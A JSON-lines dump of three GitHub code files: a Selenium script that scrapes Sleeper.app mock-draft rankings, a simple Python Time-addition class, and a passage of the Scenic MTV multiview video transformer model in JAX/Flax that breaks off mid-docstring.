+{"seq_id":"16123443937","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.chrome.options import Options\n\nimport pandas as pd\nimport time\nfrom datetime import date\n\nUSERNAME = \"\" # Sleeper.app Username\nPASSWORD = \"\" # Sleeper.app Password\n\nchrome_options = Options()\n# If you uncomment these line the browser will run headless meaning\n# it wont open a browser window for you to look at\n# chrome_options.add_argument(\"--headless\")\n# chrome_options.add_argument(\"--disable-gpu\")\n\n# My chromedriver.exe is in the project path. Update accordingly\ndriver = webdriver.Chrome(executable_path='./driver/chromedriver.exe', options=chrome_options)\ndriver.get(\"https://sleeper.app/login\") # Get to the Login Page\n\n# Find Username field using XPath - Fill in Username\ndriver.find_element_by_xpath(\"//input\").send_keys(USERNAME)\n\n# Find Login Button - Clock\nloginButton = driver.find_element_by_xpath(\n '//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"login-button\", \" \" ))]')\nloginButton.click()\n\ntime.sleep(2)\n\n# After First Click Password Field Will Show Up - Enter Password and click again\ndriver.find_elements_by_xpath('//input')[1].send_keys(PASSWORD)\nloginButton.click()\n\n# LOGGED IN NOW - Waiting just to make sure\ntime.sleep(10)\n\n# Click Mock Draft Page - Click on first Mock Draft Found\n# HINT: You NEED to create this mock draft by hand before\ndriver.find_element_by_xpath(\n '//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"nav-draftboard-item\", \" \" ))]//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"title\", \" \" ))]').click()\ntime.sleep(5)\ndriver.find_element_by_class_name(\"draft-list-item\").click()\ntime.sleep(2)\n\n# Switch To New Mock Draft Tab\n# Although it looks like it, the active window is not yet the mock draft\ndriver.switch_to.window(driver.window_handles[1])\n\n# Init Data Loading Web Driver\nwait = WebDriverWait(driver, 15)\n\nscraped_elements = set() # Contains ID's of already scraped names\nexecute_loop = True\nrows_list = [] # Contains Dicts - Row of our DataFrame\nrank = 1 # Counter for Rank\nwhile execute_loop:\n # Get Visible Entries\n names = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.name-wrapper')))\n for name in names:\n if name.id in scraped_elements: # Already Scraped\n continue\n\n # New Player\n scraped_elements.add(name.id)\n data_extract = name.text.split('\\n')\n\n if len(data_extract) < 3: # Not Fully Loaded -> Remove Again\n scraped_elements.remove(name.id)\n break\n\n rows_list.append({\n \"rank\": rank,\n \"name\": data_extract[0],\n \"pos\": data_extract[1],\n \"team\": data_extract[2]\n })\n\n print(f\"{rank} - {data_extract[0]}\")\n\n rank += 1\n\n if len(rows_list) >= 300: # Only Scrape First 300 Players\n print(\"ABORTING..\")\n execute_loop = False\n\n # Scroll Down\n # .odd is every other row\n # (You could probably scroll down more/faster)\n ActionChains(driver).move_to_element(driver.find_elements_by_css_selector(\".odd\")[5]).perform()\n\n# Write CSV\ndf = pd.DataFrame(data=rows_list)\nprint(df)\ndf.to_csv(f\"data/sleeper-mock-ranks-{date.today()}.csv\", index=False)\ndriver.quit() # 
Quit\n","repo_name":"maxhuebner/maxhuebner.github.io","sub_path":"post/data/sleeper_extract_mock_data.py","file_name":"sleeper_extract_mock_data.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22681585926","text":"class Time:\n def __init__(self, hour=0, minute=0, second=0):\n self.hour = hour\n self.minute = minute\n self.second = second\n def __str__(self):\n return \"{}:{:02d}:{:02d}\".format(self.hour,self.minute, self.second)\n def __add__(self, other_time):\n new_time = Time()\n if (self.second + other_time.second) >= 60:\n self.minute += 1\n new_time.second = (self.second + other_time.second) - 60\n else:\n new_time.second = self.second + other_time.second\n if (self.minute + other_time.minute) >= 60:\n self.hour += 1\n new_time.minute = (self.minute + other_time.minute) - 60\n else:\n new_time.minute = self.minute + other_time.minute\n if (self.hour + other_time.hour) > 24:\n new_time.hour = (self.hour + other_time.hour) - 24\n else:\n new_time.hour = self.hour + other_time.hour\n return new_time\ndef main():\n time1 = Time(2, 12, 30)\n print(time1)\n time2 = Time(24, 41, 30)\n print(time1 + time2)\nmain()\n","repo_name":"InnovativeCoder/Innovative-Hacktober","sub_path":"Python/add_2times.py","file_name":"add_2times.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"}
+{"seq_id":"24789023481","text":"\"\"\"Implements the MTV model.\"\"\"\nimport functools\nfrom typing import Any, List, Sequence, Tuple, Union\n\nimport flax.linen as nn\nimport jax\nimport jax.numpy as jnp\nimport ml_collections\nfrom scenic.model_lib.layers import attention_layers\nfrom scenic.model_lib.layers import nn_layers\nfrom scenic.projects.baselines import vit\nfrom scenic.projects.mtv import model_utils\nfrom scenic.projects.vivit import model as vivit_model\nfrom scenic.train_lib import train_utils\n\n_DEFAULT_MTV_CONFIG = ml_collections.ConfigDict({\n 'dataset_configs': {\n 'num_frames': 8,\n },\n 'model':\n dict(\n view_configs=[\n ml_collections.ConfigDict({\n 'hidden_size': 16,\n 'patches': {\n 'size': (4, 4, 2)\n },\n 'num_heads': 2,\n 'mlp_dim': 32,\n 'num_layers': 1,\n })\n ],\n cross_view_fusion=None,\n temporal_encoding_config=ml_collections.ConfigDict({\n 'method': '3d_conv',\n 'kernel_init_method': 'central_frame_initializer',\n }),\n global_encoder_config=ml_collections.ConfigDict({\n 'num_layers': 2,\n 'mlp_dim': 8,\n 'num_heads': 2,\n 'hidden_size': 8,\n }),\n dropout_rate=0.,\n attention_dropout_rate=0.,\n classifier='token',\n data_dtype_str='float32')\n})\n\n\ndef get_model_cls(model_name):\n \"\"\"\"Selects MTV model type.\"\"\"\n if model_name == 'mtv_multiclass_classification':\n return MTVClassificationModel\n elif model_name == 'mtv_multihead_classification':\n return MTVMultiheadClassificationModel\n else:\n raise ValueError('Unrecognized model: {}'.format(model_name))\n\n\nclass CrossViewAttentionEncoderBlock(nn.Module):\n \"\"\"Crossview Transformer encoder layer.\n\n The encoder architecture for each view is as follows:\n Layer norm\n cross attention (out projection weights are initialized with zeros)\n residual connection\n Layer norm\n self attention (initialized with pretrained ViT weights)\n residual connection\n Layer norm\n MLP (initialized with pretrained ViT weights)\n residual connection\n\n We apply cross attention in a sequential fashion and limit it to only take\n place in neighboring views. For example, view[i-1] is used as the query and\n view[i] is used as key and value. This design is based on the assumption\n that the tubelet sizes grow from 0th view to the nth view. 
We initialize cross\n attention's weights with zeros and self attention and MLP weights are\n initialized with pretrained ViTs.\n\n Attributes:\n view_configs: Model configs for each view (e.g., num_heads, mlp_dim, etc).\n cross_view_fusion: Cross view fusion config.\n dtype: The dtype of the computation (default: float32).\n dropout_rate: Dropout rate.\n attention_dropout_rate: Dropout for attention heads.\n stochastic_depth: probability of dropping a layer linearly grows from 0 to\n the provided value.\n\n Returns:\n output after transformer encoder block.\n \"\"\"\n view_configs: Sequence[ml_collections.ConfigDict]\n cross_view_fusion: ml_collections.ConfigDict\n dtype: Any = jnp.float32\n dropout_rate: float = 0.0\n attention_dropout_rate: float = 0.0\n stochastic_depth: float = 0.0\n\n def _get_stochastic_depth_rate(self, cur_layer, view_idx):\n \"\"\"Returns the stochastic depth rate for the current layer and view.\"\"\"\n max_layer = max(self.view_configs[view_idx]['num_layers'] - 1, 1)\n return (cur_layer / max_layer) * self.stochastic_depth\n\n def _apply_self_attentions(self, tokens: List[jnp.ndarray], cur_layer: int,\n deterministic: bool) -> List[jnp.ndarray]:\n \"\"\"Applies self attentions for each view.\"\"\"\n for view_idx, x in enumerate(tokens):\n if cur_layer >= self.view_configs[view_idx]['num_layers']:\n continue\n y = nn.LayerNorm(dtype=self.dtype, name=f'msa_ln_view{view_idx}')(x)\n config = self.view_configs[view_idx]\n y = nn.MultiHeadDotProductAttention(\n num_heads=config['num_heads'],\n dtype=self.dtype,\n broadcast_dropout=False,\n deterministic=deterministic,\n dropout_rate=self.attention_dropout_rate,\n name=f'msa_view{view_idx}')(y, y)\n y = nn.Dropout(rate=self.dropout_rate)(y, deterministic)\n r = self._get_stochastic_depth_rate(cur_layer, view_idx)\n tokens[view_idx] += nn_layers.StochasticDepth(r)(y, deterministic)\n return tokens\n\n def _apply_cross_attention(\n self,\n tokens: List[jnp.ndarray],\n cur_layer: int,\n deterministic: bool,\n fuse_in_descending_order: bool,\n ) -> List[jnp.ndarray]:\n \"\"\"Applies cross view attention.\"\"\"\n xs = [\n nn.LayerNorm(dtype=self.dtype, name=f'cross_attention_ln_view{idx}')(x)\n for idx, x in enumerate(tokens)\n ]\n view_indices = (\n range(len(xs) -\n 1, 0, -1) if fuse_in_descending_order else range(len(xs) - 1))\n for view_index in view_indices:\n query_view_index = (\n view_index - 1 if fuse_in_descending_order else view_index + 1)\n key_value_view_index = view_index\n query = xs[query_view_index]\n key_value = xs[key_value_view_index]\n num_heads = (\n self.view_configs[query_view_index]['num_heads']\n if self.cross_view_fusion.use_query_config else\n self.view_configs[key_value_view_index]['num_heads'])\n qkv_features = (\n query.shape[-1]\n if self.cross_view_fusion.use_query_config else key_value.shape[-1])\n\n y = attention_layers.MultiHeadAttention(\n num_heads=num_heads,\n dtype=self.dtype,\n qkv_features=qkv_features,\n out_kernel_init=nn.initializers.zeros,\n dropout_rate=self.attention_dropout_rate,\n name=f'cross_attention_view{query_view_index}_{key_value_view_index}'\n )(query, key_value, deterministic=deterministic)\n y = nn.Dropout(rate=self.dropout_rate)(y, deterministic)\n r = self._get_stochastic_depth_rate(cur_layer, view_index)\n tokens[query_view_index] += nn_layers.StochasticDepth(r)(y, deterministic)\n\n return tokens\n\n def _apply_mlp(self, tokens: List[jnp.ndarray], cur_layer: int,\n deterministic: bool) ->List[jnp.ndarray]:\n \"\"\"Applies MLP block.\"\"\"\n for view_idx, x in 
enumerate(tokens):\n if cur_layer >= self.view_configs[view_idx]['num_layers']:\n continue\n y = nn.LayerNorm(dtype=self.dtype, name=f'mlp_ln_view{view_idx}')(x)\n y = attention_layers.MlpBlock(\n mlp_dim=self.view_configs[view_idx]['mlp_dim'],\n dtype=self.dtype,\n dropout_rate=self.dropout_rate,\n activation_fn=nn.gelu,\n kernel_init=nn.initializers.xavier_uniform(),\n bias_init=nn.initializers.normal(stddev=1e-6),\n name=f'mlp_view{view_idx}')(\n y, deterministic=deterministic)\n r = self._get_stochastic_depth_rate(cur_layer, view_idx)\n tokens[view_idx] += nn_layers.StochasticDepth(r)(y, deterministic)\n return tokens\n\n @nn.compact\n def __call__(self, tokens: List[jnp.ndarray], cur_layer: int,\n deterministic: bool) -> List[jnp.ndarray]:\n \"\"\"Applies CrossViewAttentionEncoderBlock module.\n\n Args:\n tokens: Input tokens from each view.\n cur_layer: Which layer we apply cross attention.\n deterministic: Deterministic or not (to apply dropout).\n\n Returns:\n Output tokens for each view.\n \"\"\"\n tokens = self._apply_cross_attention(\n tokens, cur_layer, deterministic,\n self.cross_view_fusion.get('fuse_in_descending_order', True))\n tokens = self._apply_self_attentions(tokens, cur_layer, deterministic)\n tokens = self._apply_mlp(tokens, cur_layer, deterministic)\n return tokens\n\n\nclass MultiviewEncoder(nn.Module):\n \"\"\"Multiview Transformer Encoder.\n\n Attributes:\n view_configs: Model configs for each view (e.g., num_heads, mlp_dim, etc).\n cross_view_fusion: Cross view fusion config.\n dropout_rate: Dropout rate.\n attention_dropout_rate: Dropout for attention heads.\n stochastic_depth: probability of dropping a layer linearly grows from 0 to\n the provided value. Our implementation of stochastic depth follows the\n timm library, which does per-example layer dropping and uses independent\n dropping patterns for each skip-connection.\n dtype: Any of activations.\n \"\"\"\n view_configs: Sequence[ml_collections.ConfigDict]\n cross_view_fusion: ml_collections.ConfigDict\n input_token_temporal_dims: Sequence[int]\n dropout_rate: float = 0.1\n attention_dropout_rate: float = 0.1\n stochastic_depth: float = 0.0\n dtype: Any = jnp.float32\n\n def _split_tokens_and_bottleneck(\n self, tokens: jnp.ndarray) -> Tuple[jnp.ndarray, jnp.ndarray]:\n \"\"\"Removes bottleneck tokens from input.\"\"\"\n return (tokens[:, :-self.cross_view_fusion.bottleneck_tokens],\n tokens[:, -self.cross_view_fusion.bottleneck_tokens:])\n\n def _add_posembed(self, tokens: Sequence[jnp.ndarray]) -> List[jnp.ndarray]:\n \"\"\"Adds positional embeddings.\"\"\"\n temporal_dims_after_alignment = [\n t // min(self.input_token_temporal_dims)\n for t in self.input_token_temporal_dims\n ]\n xs = []\n for idx, t in enumerate(tokens):\n bs, spacetime, channels = t.shape\n reshaped_t = t.reshape(\n (bs, temporal_dims_after_alignment[idx], -1, channels))\n add_posembed_fn = vit.AddPositionEmbs(name=f'posembed_input_view{idx}')\n x = jax.vmap(add_posembed_fn, in_axes=1, out_axes=1)(reshaped_t)\n xs.append(x.reshape(bs, spacetime, channels))\n return xs\n\n def _build_with_bottleneck(\n self,\n xs: List[jnp.ndarray],\n bottleneck: jnp.ndarray,\n fusion_layers: Sequence[int],\n max_num_layers: int,\n train: bool,\n dtype: Any,\n ) -> List[jnp.ndarray]:\n \"\"\"Builds the encoder with bottlenecks.\"\"\"\n view_indices = list(range(len(self.view_configs)))\n if self.cross_view_fusion.get('fuse_in_descending_order', True):\n view_indices.reverse()\n for lyr in range(max_num_layers):\n for view_idx in view_indices:\n 
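# At fusion layers the shared bottleneck tokens are concatenated to this\n # view's sequence before its encoder block and split off again afterwards,\n # so cross-view information flows only through the bottleneck.\n 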
view_config = self.view_configs[view_idx]\n if lyr >= view_config['num_layers']:\n continue\n if lyr in fusion_layers:\n if xs[view_idx].shape[-1] != bottleneck.shape[-1]:\n bottleneck = nn.Dense(\n xs[view_idx].shape[-1],\n kernel_init=nn.initializers.xavier_uniform(),\n name=f'bottleneck_linear_{lyr}_view{view_idx}')(\n bottleneck)\n xs[view_idx] = jnp.concatenate([xs[view_idx], bottleneck], axis=1)\n\n xs[view_idx] = vit.Encoder1DBlock(\n mlp_dim=view_config['mlp_dim'],\n num_heads=view_config['num_heads'],\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=(lyr / max(view_config['num_layers'] - 1, 1)) *\n self.stochastic_depth,\n name=f'encoderblock_{lyr}_view{view_idx}',\n dtype=self.dtype)(\n xs[view_idx], deterministic=not train)\n if lyr in fusion_layers:\n xs[view_idx], bottleneck = self._split_tokens_and_bottleneck(\n xs[view_idx])\n return xs\n\n def _build_with_cross_view_attention(\n self,\n xs: List[jnp.ndarray],\n fusion_layers: Sequence[int],\n max_num_layers: int,\n train: bool,\n dtype: Any,\n ) -> List[jnp.ndarray]:\n \"\"\"Builds the encoder with bottlenecks.\"\"\"\n for lyr in range(max_num_layers):\n if lyr in fusion_layers:\n xs = CrossViewAttentionEncoderBlock(\n view_configs=self.view_configs,\n cross_view_fusion=self.cross_view_fusion,\n dtype=self.dtype,\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=self.stochastic_depth,\n name=f'cross_view_encoderblock_{lyr}')(\n xs, lyr, deterministic=not train)\n else:\n for view_idx, view_config in enumerate(self.view_configs):\n if lyr >= view_config['num_layers']:\n continue\n xs[view_idx] = vit.Encoder1DBlock(\n mlp_dim=view_config['mlp_dim'],\n num_heads=view_config['num_heads'],\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=(lyr / max(view_config['num_layers'] - 1, 1)) *\n self.stochastic_depth,\n name=f'encoderblock_{lyr}_view{view_idx}',\n dtype=self.dtype)(\n xs[view_idx], deterministic=not train)\n return xs\n\n @nn.compact\n def __call__(self,\n tokens: Sequence[jnp.ndarray],\n bottleneck: Union[jnp.ndarray, None],\n train: bool = False) -> List[jnp.ndarray]:\n \"\"\"Applies Transformer model on the tokens.\n\n This function will be called within a vmap along the time axis. Before\n calling this function, we need to make sure all elements in the list have\n the same temporal dimension.\n\n Args:\n tokens: A sequence of input tubelet tokens. Each one is a 3D float tensor\n of shape (batch, sequence_len, channels). We assume that tokens[0]\n contains tokens from the largest view while tokens[-1] are from the\n smallest view. We define a view as a representation of the input video\n composed of tubelets. A larger view corresponds to larger tubelets.\n bottleneck: A 3D float tensor of shape (batch, num_tokens, channels)\n representing a set of tokens used for fusing information among views.\n train: Whether or not it is in training.\n\n Returns:\n A list of activations after encoding for each view. 
They have the same\n shapes as their input counterparts.\n \"\"\"\n\n for t in tokens:\n assert t.ndim == 3 # Shape is `[batch, len, emb]`.\n dtype = jax.dtypes.canonicalize_dtype(self.dtype)\n xs = self._add_posembed(tokens)\n max_num_layers = max([config['num_layers'] for config in self.view_configs])\n fusion_layers = ([] if self.cross_view_fusion is None else\n self.cross_view_fusion.fusion_layers)\n\n if (self.cross_view_fusion is None or\n self.cross_view_fusion.type == 'cross_view_attention'):\n return self._build_with_cross_view_attention(xs, fusion_layers,\n max_num_layers, train, dtype)\n if self.cross_view_fusion.type == 'bottleneck':\n return self._build_with_bottleneck(xs, bottleneck, fusion_layers,\n max_num_layers, train, dtype)\n raise ValueError(\n f'Invalid cross view fusion type: {self.cross_view_fusion.type}.')\n\n\nclass MTV(nn.Module):\n \"\"\"MTV model.\"\"\"\n view_configs: Sequence[ml_collections.ConfigDict]\n cross_view_fusion: ml_collections.ConfigDict\n temporal_encoding_config: ml_collections.ConfigDict\n global_encoder_config: ml_collections.ConfigDict\n input_token_temporal_dims: Sequence[int]\n num_classes: int\n classifier: str\n dropout_rate: float = 0.1\n attention_dropout_rate: float = 0.1\n stochastic_depth: float = 0.0\n keep_spatiotemporal_features: bool = False\n final_endpoint: str = 'logits'\n dtype: Any = jnp.float32\n\n def _add_cls_token(self, x: jnp.ndarray, name: str) -> jnp.ndarray:\n \"\"\"Prepends CLS token.\n\n Args:\n x: A 3D float tensor of shape (batch, sequence_len, channels) representing\n the tokens.\n name: Parameter name of the added CLS token.\n\n Returns:\n A 3D float tensor with prepended CLS token. Its new shape is (batch,\n sequence_len+1, channels).\n \"\"\"\n if self.classifier == 'token':\n bs, _, c = x.shape\n cls = self.param(name, nn.initializers.zeros, (1, 1, c), x.dtype)\n cls = jnp.tile(cls, [bs, 1, 1])\n x = jnp.concatenate([cls, x], axis=1)\n return x\n\n def _add_cls_tokens_all_frames(self, x: jnp.ndarray,\n name: str) -> jnp.ndarray:\n \"\"\"Prepends CLS token for all frames.\n\n Args:\n x: A 4D float tensor of shape (batch, time, sequence_len, channels)\n representing the tokens.\n name: Parameter name of the added CLS token.\n\n Returns:\n A 4D float tensor with prepended CLS token. Its new shape is (batch, time,\n sequence_len+1, channels).\n \"\"\"\n if self.classifier == 'token':\n bs, time, _, c = x.shape\n cls = self.param(name, nn.initializers.zeros, (1, time, 1, c), x.dtype)\n cls = jnp.tile(cls, [bs, 1, 1, 1])\n x = jnp.concatenate([cls, x], axis=2)\n return x\n\n def _add_cls_tokens_for_all_views(\n self, tokens: Sequence[jnp.ndarray]) -> List[jnp.ndarray]:\n \"\"\"Prepends CLS tokens for all views.\n\n Args:\n tokens: Tokens from all views. Each one has a shape of (batch, time,\n sequence_len, channels)\n\n Returns:\n A list of tokens with CLS tokens added. 
Each one has a new shape of\n (batch, time, sequence_len+1, channels).\n \"\"\"\n outputs = []\n for idx, x in enumerate(tokens):\n outputs.append(self._add_cls_tokens_all_frames(x, name=f'cls_view{idx}'))\n return outputs\n\n def _extract_encoder_output(self,\n x: jnp.ndarray,\n axis: int = 1) -> jnp.ndarray:\n \"\"\"Extracts encoder output.\"\"\"\n if self.classifier in ['token', '0']:\n x = x.take(indices=0, axis=axis)\n elif self.classifier in ('gap', 'gmp', 'gsp'):\n fn = {'gap': jnp.mean, 'gmp': jnp.max, 'gsp': jnp.sum}[self.classifier]\n x = fn(x, axis=list(range(axis, x.ndim - 1)))\n return x\n\n def _tokenize(self, x: jnp.ndarray) -> List[jnp.ndarray]:\n \"\"\"Creates tokens for each view.\n\n Args:\n x: A 5D float tensor of shape (batch, time, height, width, channels)\n representing the input video.\n\n Returns:\n Tokens for each view and each one has a shape of (batch, time,\n sequence_len, channels).\n \"\"\"\n tokens = []\n for idx, config in enumerate(self.view_configs):\n view_tokens, _ = vivit_model.temporal_encode(\n x,\n self.temporal_encoding_config,\n ml_collections.ConfigDict(config['patches']),\n config['hidden_size'],\n return_1d=False,\n name=f'embedding_view{idx}')\n bs, t, h, w, c = view_tokens.shape\n view_tokens = view_tokens.reshape(bs, t, h * w, c)\n tokens.append(view_tokens)\n return tokens\n\n def _align_temporal_dimension_across_views(\n self, tokens: Sequence[jnp.ndarray]) -> List[jnp.ndarray]:\n \"\"\"Reshapes tokens from each view so they have the same temporal dim.\"\"\"\n min_temporal_dim = min(self.input_token_temporal_dims)\n outputs = []\n for t in tokens:\n bs, time, n, c = t.shape\n outputs.append(\n t.reshape(bs, min_temporal_dim, (n * time) // min_temporal_dim, c))\n return outputs\n\n def _merge_views_along_time_axis(self, tokens: Sequence[jnp.ndarray],\n hidden_size: int) -> jnp.ndarray:\n \"\"\"Merges tokens from each view along the time axis.\"\"\"\n projected_tokens = []\n for view_idx, x in enumerate(tokens):\n bs, time, n, c = x.shape\n x = x.reshape(bs, self.input_token_temporal_dims[view_idx],\n (time * n) // self.input_token_temporal_dims[view_idx], c)\n if not self.keep_spatiotemporal_features:\n x = self._extract_encoder_output(x, axis=2)\n projected_tokens.append(\n nn.Dense(\n hidden_size,\n kernel_init=nn.initializers.xavier_uniform(),\n name=f'global_encoder_linear_view{view_idx}')(x))\n return jnp.concatenate(projected_tokens, axis=1)\n\n def _merge_views_along_channel_axis(\n self, tokens: Sequence[jnp.ndarray]) -> jnp.ndarray:\n \"\"\"Merges tokens from each view along the channel axis.\"\"\"\n max_temporal_dim = max(self.input_token_temporal_dims)\n xs = []\n for idx, x in enumerate(tokens):\n bs, time, n, c = x.shape\n x = x.reshape(bs, self.input_token_temporal_dims[idx],\n (time * n) // self.input_token_temporal_dims[idx], c)\n if self.keep_spatiotemporal_features:\n xs.append(jnp.tile(x, (1, max_temporal_dim // x.shape[1], 1, 1)))\n else:\n x = self._extract_encoder_output(x, axis=2)\n xs.append(jnp.tile(x, (1, max_temporal_dim // x.shape[1], 1)))\n return jnp.concatenate(xs, axis=-1)\n\n def _global_encode(self, tokens: Sequence[jnp.ndarray],\n is_train: bool) -> jnp.ndarray:\n \"\"\"Applies the global encoder.\n\n We support two strategies to merge encoded tokens from each view:\n\n In the first strategy, we extract the CLS tokens from each view (we apply\n pooling when other classifiers are used), apply tiling to match the temporal\n dimension, and concatenate them in the channel dimension.\n\n In the second strategy, 
after we extract the CLS tokens we linear project\n them into the same dimension and concatenate them along the temporal\n dimension.\n\n The global encoder is implemented as a ViT encoder.\n\n Args:\n tokens: A list of tokens from each view. Each one has a shape of (batch,\n time, sequence_len, channels).\n is_train: Whether or not it is in training.\n\n Returns:\n A 2D float tensor representing the embedding from the global encoder.\n \"\"\"\n encoder_config = self.global_encoder_config.to_dict()\n encoder_config.update(\n dict(\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=self.stochastic_depth,\n dtype=self.dtype,\n name='global_encoder'))\n merge_axis = encoder_config.pop('merge_axis', 'channel')\n hidden_size = encoder_config.pop('hidden_size')\n if merge_axis == 'time':\n x = self._merge_views_along_time_axis(tokens, hidden_size)\n elif merge_axis == 'channel':\n x = self._merge_views_along_channel_axis(tokens)\n else:\n raise ValueError(f'Invalid merge_axis: {merge_axis}.')\n x = self._add_cls_token(x, name='cls_global')\n encoder = vit.Encoder(**encoder_config)\n if self.keep_spatiotemporal_features:\n x = jax.vmap(\n functools.partial(encoder, train=is_train), in_axes=2, out_axes=2)(\n x)\n else:\n x = encoder(x, train=is_train)\n return (x if self.keep_spatiotemporal_features else\n self._extract_encoder_output(x))\n\n def _encode_per_time(\n self,\n tokens: Sequence[jnp.ndarray],\n bottleneck: Union[jnp.ndarray, None],\n is_train: bool,\n ) -> List[jnp.ndarray]:\n \"\"\"Encodes input tokens on a per-time basis.\"\"\"\n\n tokens = MultiviewEncoder(\n view_configs=self.view_configs,\n cross_view_fusion=self.cross_view_fusion,\n input_token_temporal_dims=self.input_token_temporal_dims,\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=self.stochastic_depth,\n dtype=self.dtype,\n name='MultiviewEncoder')(\n tokens, bottleneck=bottleneck, train=is_train)\n return tokens\n\n def _check_config(self, x: jnp.ndarray):\n \"\"\"Checks configuration errors.\"\"\"\n if self.keep_spatiotemporal_features and self.classifier == 'token':\n raise ValueError('Classifier cannot be `token` when '\n '`keep_spatiotemporal_features` is True.')\n heights = [config['patches']['size'][0] for config in self.view_configs]\n widths = [config['patches']['size'][1] for config in self.view_configs]\n if self.keep_spatiotemporal_features and (len(set(heights)) > 1 or\n len(set(widths)) > 1):\n raise ValueError('Patches from different views must have the same height '\n 'and width when `keep_spatiotemporal_features` is True.')\n\n @nn.compact\n def __call__(self,\n x: jnp.ndarray,\n *,\n train: bool = True,\n debug: bool = False):\n \"\"\"Executes MTV model.\n\n Args:\n x: A 5D float tensor of shape (batch, time, height, width, channels)\n representing the input video.\n train: Whether or not it is in training.\n debug: Whether or not it is in debug mogde. 
Not used here.\n\n Returns:\n The logits produced by the MTV model.\n \"\"\"\n del debug\n self._check_config(x)\n tokens = self._tokenize(x)\n tokens = self._add_cls_tokens_for_all_views(tokens)\n tokens = self._align_temporal_dimension_across_views(tokens)\n if (self.cross_view_fusion is not None and\n self.cross_view_fusion.type == 'bottleneck'):\n if self.cross_view_fusion.get('fuse_in_descending_order', True):\n channels = tokens[-1].shape[-1]\n else:\n channels = tokens[0].shape[-1]\n bottleneck = self.param(\n 'bottleneck', nn.initializers.normal(stddev=0.02),\n (1, tokens[0].shape[1], self.cross_view_fusion.bottleneck_tokens,\n channels), self.dtype)\n bottleneck = jnp.tile(bottleneck, [x.shape[0], 1, 1, 1])\n tokens = jax.vmap(\n functools.partial(self._encode_per_time, is_train=train),\n in_axes=(1, 1),\n out_axes=1)(tokens, bottleneck)\n else:\n tokens = jax.vmap(\n functools.partial(\n self._encode_per_time, bottleneck=None, is_train=train),\n in_axes=1,\n out_axes=1)(\n tokens)\n tokens = self._global_encode(tokens, train)\n if self.keep_spatiotemporal_features:\n bs, _, h, w, _ = x.shape\n tokens = tokens.reshape(\n (bs, tokens.shape[1], h // self.view_configs[0].patches.size[0],\n w // self.view_configs[0].patches.size[1], -1))\n pre_logits = nn_layers.IdentityLayer(name='pre_logits')(tokens)\n if self.final_endpoint == 'pre_logits':\n return pre_logits\n if self.keep_spatiotemporal_features:\n pre_logits = self._extract_encoder_output(pre_logits, axis=1)\n logits = nn.Dense(\n self.num_classes,\n kernel_init=nn.initializers.zeros,\n name='output_projection')(\n pre_logits)\n if self.final_endpoint == 'logits':\n return logits\n raise ValueError(f'Final endpoint `{self.final_endpoint}` not recognized.')\n\n\nclass MTVClassificationModel(vivit_model.ViViTClassificationModel):\n \"\"\"MTV model for multiclass classification task.\"\"\"\n\n def build_flax_model(self) -> nn.Module:\n model_dtype = getattr(jnp, self.config.get('model_dtype_str', 'float32'))\n return MTV(\n view_configs=self.config.model.view_configs,\n cross_view_fusion=self.config.model.cross_view_fusion,\n temporal_encoding_config=self.config.model.temporal_encoding_config,\n global_encoder_config=self.config.model.global_encoder_config,\n input_token_temporal_dims=model_utils.get_input_token_temporal_dims(\n self.config.dataset_configs.num_frames,\n self.config.model.view_configs),\n num_classes=self.dataset_meta_data['num_classes'],\n classifier=self.config.model.classifier,\n dropout_rate=self.config.model.get('dropout_rate', 0.0),\n attention_dropout_rate=self.config.model.get('attention_dropout_rate',\n 0.1),\n stochastic_depth=self.config.model.get('stochastic_depth', 0.0),\n keep_spatiotemporal_features=self.config.model.get(\n 'keep_spatiotemporal_features', False),\n final_endpoint=self.config.model.get('final_endpoint', 'logits'),\n dtype=model_dtype)\n\n def default_flax_model_config(self) -> ml_collections.ConfigDict:\n return _DEFAULT_MTV_CONFIG\n\n def init_from_train_state(\n self,\n train_state: train_utils.TrainState,\n restored_train_state: train_utils.TrainState,\n restored_model_cfg: ml_collections.ConfigDict,\n restore_output_proj: bool = False) -> train_utils.TrainState:\n \"\"\"Updates the train_state with data from restored_train_state.\n\n This function is writen to be used for 'fine-tuning' experiments. 
The input\n embeddings and positional embeddings are resized if the current model uses\n a different size of tubelets than the pretrained model.\n\n Args:\n train_state: A raw TrainState for the model.\n restored_train_state: A TrainState that is loaded with parameters/state of\n a pretrained model.\n restored_model_cfg: Configuration of the model from which the\n restored_train_state come from. Usually used for some asserts.\n restore_output_proj: Whether or not to restore output projection weights.\n\n Returns:\n Updated train_state.\n \"\"\"\n return model_utils.initialize_from_mtv_train_state(\n self.config,\n train_state,\n restored_train_state,\n restored_model_cfg,\n restore_output_projection=restore_output_proj)\n\n def init_from_vit_train_states(\n self,\n train_state: train_utils.TrainState,\n restored_train_states: Sequence[train_utils.TrainState],\n restored_model_cfgs: Sequence[ml_collections.ConfigDict],\n restored_model_formats: Sequence[str],\n ) -> train_utils.TrainState:\n \"\"\"Updates the train_state with data from restored_train_states.\n\n This function is used to initialize a MTV model from a list of ViT\n checkpoints. We assume that the number of restored_train_states is equal to\n the number of views.\n\n Args:\n train_state: A raw TrainState for the model.\n restored_train_states: A sequence of TrainStates that is loaded with\n parameters/state of a pretrained ViT model.\n restored_model_cfgs: A sequence of model configuration of the pretrained\n ViT models. Usually used for some asserts.\n restored_model_formats: The checkpoint format of each model. The format\n can be 'scenic' or 'big_vision'.\n\n Returns:\n Updated train_state.\n 